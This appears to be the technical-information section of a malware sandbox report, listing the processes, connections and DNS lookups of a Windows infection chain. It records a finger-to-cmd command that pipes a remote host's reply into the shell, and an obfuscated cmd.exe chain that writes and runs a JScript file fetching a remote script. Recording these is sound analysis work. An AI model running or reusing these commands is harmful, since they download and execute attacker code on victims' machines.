Technical Information
- '<SYSTEM32>\finger.exe' ok@teoi5w.moguor.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\BZc.js"
- C:\users\public\bzc.js
- 'te####.moguor.xyz':79
- 'a8####.vuiworn.xyz':80
- 'cl###flare.com':443
- 'microsoft.com':80
- DNS ASK te####.moguor.xyz
- DNS ASK a8####.vuiworn.xyz
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger ok@teoi5w.moguor.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt DGJE=.j&&SEt HRVUG=voYAdaroYAd a =oYAd 'scoYAdrioYAdptoYAd:'; b =oYAd 'hoYAdTtPoYAd:'; GoYAdetoYAdObjoYAdecoYAdt(oYAda+b+'&&sET WCTU=DMICEDMICEa8aoiw.vuiworn.xyzDMICE?1DMICE')&&sEt/...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p KQ1ZR="%HRVUG:oYAd=%%WCTU:DMICE=/%" 0<nul 1>C:\Users\Public\BZc%DGJE%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\BZc%DGJE%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\BZc.js